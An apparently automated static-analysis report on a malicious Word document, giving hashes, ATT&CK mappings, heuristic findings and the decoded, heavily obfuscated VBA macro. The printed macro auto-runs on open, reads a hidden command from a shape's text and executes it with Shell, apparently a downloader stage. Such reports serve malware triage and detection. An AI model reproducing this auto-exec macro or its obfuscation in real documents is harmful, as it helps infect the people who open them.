Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a09cc3bd6d10f106…

MALICIOUS

Office (OLE)

Size: 136.4 KB
Created: 2018-12-06 21:33:00
Authoring application: Microsoft Office Word
First seen: 2019-01-12
MD5: 2a7366b4fa700fbddda0f452615ad5c7
SHA-1: 0df69a2934bfb775d1ff42e5683d5ab95afb7682
SHA-256: a09cc3bd6d10f106f7b37fc71033bc299ce768f3e7be5c0c542af192dfbf170b
Risk score: 292

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059.001 PowerShell
  • T1204.002 Malicious File
  • T1059.003 Windows Command Shell

The sample contains a VBA macro with an autoopen subroutine that uses the Shell() function to execute a command. This command invokes cmd.exe with flags that suggest it is intended to download and execute a second-stage payload, likely via PowerShell. The multiple high and critical heuristic firings related to VBA macros and command execution support this assessment.

Heuristics (10)

  • ClamAV: Doc.Malware.Generic-6775361-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Generic-6775361-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    ZcXvMMQ = Array(UoJfIbG, qBmJPSClv, NhvPtKcku, Interaction _
    .Shell(BnTbrPorW, cbdmS), wodqZ)
       NfniMoMrrTQWShSLwFPpj = 206942206 * CInt(273639464) + qSoMiusHPQosuOpN + CLng(74775348 + Sgn(rwjNBimJrjirBi) - 276144311 * 192448080) - tzzMzaJHBsaQiPBdcntdcQK + Chr(VDJZYPGCRVvOLruVXFz) * 251211342 / CStr(81305801) / (IThNYuwzPcpZruRkjmlXzMT / 258014778 / ltXGXRYNcuprLqLFR / Fix(SZlzAEmWNAoswzt + Hex(mBZssLQMPzcsXvaRiGBOjmt) + 128496983 + CBool(131059806 + EXYjwpwQEJjZNH)))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
    Sub autoopen()
    FqzGRYz
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 8085 bytes
SHA-256: a52800506f0589541bcaca044c126195ba2569907216127a83503667c5eb9dfe
Detection
ClamAV: No threats found
Obfuscation or payload: likely
194 of 226 identifiers look randomly generated (e.g. 'ERjthEzLNTsdLllkGGYzmJbM') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "DUJlCSmWJRRcpj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
FqzGRYz
End Sub

Attribute VB_Name = "JPArptkiij"
Function FqzGRYz()
On Error Resume Next
   VsjwjBRLIiTauna = 109538257 * CInt(73409720) + LShaGHwDRFrkdwJvrWAk + CLng(68176563 + Sgn(cZphPAmwhIISAXZu) - 250903192 * 162377197) - fkMUYBXQzwDPbWwqHlZsvRSY + Chr(bKvlVwkckicPFRjrjmCds) * 222028586 / CStr(317860163) / (hRJMjDORolwqbi / 199165635 / TnqrVaBTtALfQuqtOuEDnXvj / Fix(LbUUpQFICKEqEfHQp + Hex(jrjAtuCcjaaMvrKbKw) + 216804195 + CBool(336690761 + jGWNklCJOwnzDP)))
   ZzPFjZMsYcFNjUPolLmkh = 289521341 * CInt(116025181) + YkinWzwwcPGcaAmiRCvhRStG + CLng(176576992 + Sgn(mczwDhiRjvuZWZdGlQ) - 86875892 * 256000315) - kZDTfwjjFrXMzNVA + Chr(MZuJTqnsfWDKhctnJBCt) * 193739860 / CStr(162215655) / (wlaDXMWLIGGEnsEQiPaza / 209307069 / YOiYpLTGCnpvXtmQjI / Fix(vEaYGvFkTdCZKSPB + Hex(tnhAozEQwzjXwzuqQjQwqY) + 196275245 + CBool(239135829 + AdzOfcIszXtbKHFWHHz)))
   YRRvRAubXkLhWrcJbwI = 154785417 * CInt(99696767) + jilZpiHEJRbasoPtibuwzo + CLng(70951262 + Sgn(WwbzMVvwJjinKrLLTTatGwzn) - 299837024 * 218278922) - hcTruTlDsHJsoWiRI + Chr(cjqPjcdORtaznEf) * 49876443 / CStr(90661888) / (qsoTYoSEJbmWbirhRz / 153840688 / tqNfCsdvTFMjJKbPS / Fix(KCwfSCcuRvFFnhk + Hex(azfIRjLXkEOFNQDbPImVUOYK) + 21398583 + CBool(47426128 + hpNSfwMkbkKqiqZuOoW)))
   iYDGUnGnbPEdlL = 71118488 * CInt(154977670) + XiaOqzYRjUIbJicC + CLng(72202266 + Sgn(EvkKznWNjwGtZIMDhFDl) - 290864879 * 167878163) - pkSwLRlcbafGcdMlnscQ + Chr(LqvzPGzWzZniQuZipKv) * 328946345 / CStr(146859297) / (TuCjZUUPtPJEduXwvLnF / 185104620 / sbLjmGwhhSDjXA / Fix(fjdBjjYVMRfGqPjKQCRBaYqh + Hex(RLhrAwXXBPfKEsVU) + 43089889 + CBool(333501911 + HAHSzIndFwXHpvnRU)))
   HbGvwBqLLqOkviwDrna = 177877219 * CInt(318085998) + ZqalwJHabYsqUYXjnzIGGci + CLng(160580244 + Sgn(lMNLtrvdOBPVNChDkPqr) - 31343105 * 94885843) - jKzdSqmzLBFNwtPhhz + Chr(GXHLavaCVMojbXoh) * 6067696 / CStr(303792897) / (cnbEETHokJViItsI / 2074213 / zZisoRlWUiqIMOnTVZi / Fix(DrTGpszifmjOoIBUfj + Hex(JShwcwczHupYSdhVHFbCvRGq) + 225013070 + CBool(312111956 + TEMSnlZVAVsqINvsjqO)))
Set HnuPEhDr = DUJlCSmWJRRcpj.Shapes(qQhWJt + "cVJaltSRfIbfQ" + cBmtIjzOP).TextFrame
   GhlwbQLrIOlcmDwLTKzofH = 44478772 * CInt(48550316) + VhWtzzhTttDHDqYiFtQ + CLng(71829657 + Sgn(pVTWDUtjGzadZG) - 232280261 * 271634699) - IREItKvEPUbJaNpwYjLDWvco + Chr(muddikopGlzGrvLYSozSWj) * 250942926 / CStr(241281638) / (AZXmbMoPVHPRaljmUTbqp / 220709388 / ziEHcVRFIswdKQDiYLqWo / Fix(GrDPjBMKurTpYHXFLuEBHZdH + Hex(VRpDfzLvDYMEMpPtzzF) + 69412376 + CBool(137872366 + vGSzwSnojNvqKjXGPsHuViL)))
BnTbrPorW = HnuPEhDr.ContainingRange + cVikf + oIKbY + HPrwIWif + iMCaXMvR + dfiFpwmi + WjpOmFrM + ZImTsLu + ImSfK + lmJKkwR
   nSIAnBnudhcSkSijfb = 312059348 * CInt(79558842) + FnmYAHAwjRUjlmosQUkl + CLng(118430744 + Sgn(KVuRLvTrqbMqhiVcmtnwtPIl) - 333898184 * 207234020) - oOGKaOJdQiiwEfsbtTvFJW + Chr(iqwVCuNITfGicjQmbYBEwD) * 325759007 / CStr(230540931) / (BoPSDafRaYUbsGiDV / 103479001 / wAPrcjThIRpitPEBG / Fix(qPFaMCLvLjRTBcohkQlwmlkt + Hex(AktaMoFbFfAKYnNjjV) + 236954844 + CBool(101753340 + QNqMioQKLEiMCMRSVzuMsw)))
   ujaZjFbTMdQurqiwQfpipin = 79361518 * CInt(118911744) + wToSwJwoEauiWdRJibiAzP + CLng(68588099 + Sgn(WXEcBPwOHsGIfufHzDmEBmJ) - 83250541 * 91403290) - zLdSqjIzwbETmoijXiWI + Chr(kwaCudGpkOrPVPkkpBXz) * 222680590 / CStr(329294829) / (CiQzZVPiqFCPOC / 103442031 / GCHLMNEQYtwhdzJwmsYYdfjU / Fix(kBJTAWhaFQwamrpZzZ + Hex(YhBrvFcVirSaVmqcLuzY) + 153819999 + CBool(98949455 + YiMWABjwdGAvnjK)))
   PGRvXbDWSYqBbCttLalQIAY = 99042485 * CInt(265098942) + VmnrOBwBwFEtfVQskRbJQsNt + CLng(121526615 + Sgn(jLlOhCGbFQiaJpD) - 170263983 * 21162893) - pRvPAPPHnifdZtZGRnQkYC + Chr(DQzJKHlGqpZEAMULWzZOcv) * 184441404 / CStr(287542728) / (BDXPJTPniszBFFzCXpozpY / 301437976 / ctkwnKIoHUIENqjWKRVUVKRu / Fix(MEGnszcJZnQiRzUjKtk + Hex(vojISpXCZcScqYaGBAPUjvnD) + 108662701 + CBool(260467284 + RBkKQjziYXwVCcakzVorsZO)))
   GTbFsmMGBfdujIpzVFwsWc = 333397624 * CInt(118478613) + mzCqQwBXhoZMOdEqmzAGFpCi + CLng(263926968 + Sgn(jmMPiVJFGoJPkjcWzU) - 110030718 * 241906942) - crBkcwLtwuTCuPO + Chr(RKDDIWQjWPRdjqiR) * 22020027 / CStr(96707017) / (uLfCXzLJtqMqTO / 75203134 / KMhzFbUNMjiKGMCzfLUAm / Fix(jFwNWqKYzPXIYFV + Hex(wSqSpqPADjnNKItKv) + 16191713 + CBool(209894889 + CsEdDnjTnzowdQMBJTS)))
   ERjthEzLNTsdLllkGGYzmJbM = 332337525 * CInt(258535062) + ZTzrqEEXSFsZdROsGB + CLng(130989866 + Sgn(wjndwhnKupXvuiXsO) - 184910535 * 12933259) - HOSiOhuiXRVKiYXtfVu + Chr(QtcdhzivuWdizuHk) * 92977555 / CStr(58568197) / (PmFmdTMQWLiNthsIN / 244562259 / wQCzoBorLjRmiWGiXLGzJV / Fix(IjPJkwHmtzYMwNnRkocBj + Hex(YzqmCVwHlfbjuPY) + 294290548 + CBool(26731515 + DzXnGKHRjuVKhUADKQSztmp)))
   MmThzsJYIjXlam = 15037227 * CInt(211063675) + WaoIHSwPKuZBkrWrNuAQa + CLng(101257947 + Sgn(qnHVituBzKVJEVtFTWR) - 265779604 * 332037042) - WXrAtMrBPIHzwUzwSWQtZ + Chr(PiSWTphuIbcFQkddzhJwvMB) * 33255408 / CStr(153612968) / (FWDvXFLfIJiXsBUUAjW / 294468687 / PToWijavDjNwuk / Fix(qNDXulbTvcoHiaMV + Hex(iUpDOZoWkkFdUYzRKimdz) + 333267567 + CBool(123788668 + ztutbwUqKiUauGboOBJBWq)))
   wwXfifQWKoJvPiwOOlSOdLO = 193803445 * CInt(267864101) + nHXhPMNiwBUGYUXuXqOwrIJH + CLng(63301301 + Sgn(LFPnkurhsIzcYzhj) - 250351994 * 307828682) - INwqjoXOqFfwQXFAHTJQZPq + Chr(OvuSRQKWOMBwNPjzNfA) * 181723456 / CStr(84996461) / (jETwZNciUsWWbntF / 320299618 / vIjDWImsmKDtOPPELpw / Fix(qwtkrJarnsFIjafEaf + Hex(LJhbSabdHGXcEGbjzPwMN) + 226450875 + CBool(309807012 + tFuKojLijHnLJVb)))
   CWCMmKwhnOdzqtpXUEirQCBm = 156323439 * CInt(257913304) + ElDImOrVZpjKITsq + CLng(163124215 + Sgn(wrWUSIzKKhAVQozw) - 287437268 * 316713173) - FrlwYQhluaXXLcbbvqjTv + Chr(cDJVDZuKKcwGSUK) * 294659705 / CStr(326780360) / (lXEknKospNDHHc / 266946374 / OipDMIrjPvbFJHQCtfiYErQz / Fix(LkjHDUTRWFcDurdfVUri + Hex(iiwAOcuQsXSpXAXKcMbHn) + 260489530 + CBool(13171059 + zwnFsjXYQwcBkGosZBiiKN)))
   kdViQpwSiuVkht = 66412499 * CInt(248434556) + iQnroARkkjZqAzSw + CLng(203154507 + Sgn(HnlNwidRdVibvqvJznlMwdEz) - 209422461 * 33281014) - civDlCwCzaRUJNXXvFJ + Chr(iurCiMSBijohrGBjhRsZzo) * 328934852 / CStr(229395678) / (TcwYGIrWQphrtZZjvXOm / 233396532 / CMnpiMjptwIVKkUcXbwK / Fix(RUrosTpDQjwwqamlQii + Hex(avkiXPpPSzmpYCkrvAlttl) + 187702701 + CBool(85929667 + ZTJhrGzRXzVkJRdi)))
Const cbdmS = 0
   GJTGVlIXkwTSQt = 179254581 * CInt(191509986) + qkkvBnrILrwztQzfAwovr + CLng(132892356 + Sgn(JkjsjTMiqpMzoIGEVbwJ) - 302681969 * 73458971) - qiTnPzmhrWEaKSvHozN + Chr(KhSLXtrTTtKlwMs) * 68614668 / CStr(105967978) / (whDIUbjhwmaTJKjEOJPI / 105497007 / FTNwMSbzZkrIDjCBMr / Fix(pzFsAkzFtwjvHQabkuW + Hex(QFwMpcAHABMwXhaYA) + 177035138 + CBool(87877497 + MNhwqpksdESHqcKj)))
   ZHLzVCjbOJIhjcDwcTlsi = 235891257 * CInt(309233464) + nTihFCSafYVPfZmVICEzh + CLng(200972179 + Sgn(pHEwJXhDpMdMCUzVMr) - 223672841 * 16735564) - HnSDhPjbfvBIvsa + Chr(EIDzVfDCMjBJhs) * 53660987 / CStr(336206679) / (QhTlucHwbKQcDHbZTIi / 201638899 / lbkQqzOaunnCjfL / Fix(QJfvzuVnZIcZkOj + Hex(UWiGjUDitYjWcaWcQSC) + 334190037 + CBool(19184687 + FqGwqiVopjDOhJAEXwFAC)))
   jrzsNfvGYYwXErUEm = 70269422 * CInt(288670758) + mZoaKfBWwUPGJo + CLng(63337112 + Sgn(jmPcqkXwjAQaXrGB) - 87536369 * 241852254) - JDXhidZKEJrNQiKVzuPJ + Chr(CrtKOazFNNtZIz) * 47280254 / CStr(79696250) / (hwRaSnonArMVGH / 330484829 / dHLdXTDZErwwoHiCJvN / Fix(sbjEEXNjnjGGuwisv + Hex(jOvsVbqqzsJKMKthiCXGY) + 5166978 + CBool(37126670 + lVkpDpcqHaPwUAGINO)))
ZcXvMMQ = Array(UoJfIbG, qBmJPSClv, NhvPtKcku, Interaction _
.Shell(BnTbrPorW, cbdmS), wodqZ)
   NfniMoMrrTQWShSLwFPpj = 206942206 * CInt(273639464) + qSoMiusHPQosuOpN + CLng(74775348 + Sgn(rwjNBimJrjirBi) - 276144311 * 192448080) - tzzMzaJHBsaQiPBdcntdcQK + Chr(VDJZYPGCRVvOLruVXFz) * 251211342 / CStr(81305801) / (IThNYuwzPcpZruRkjmlXzMT / 258014778 / ltXGXRYNcuprLqLFR / Fix(SZlzAEmWNAoswzt + Hex(mBZssLQMPzcsXvaRiGBOjmt) + 128496983 + CBool(131059806 + EXYjwpwQEJjZNH)))
End Function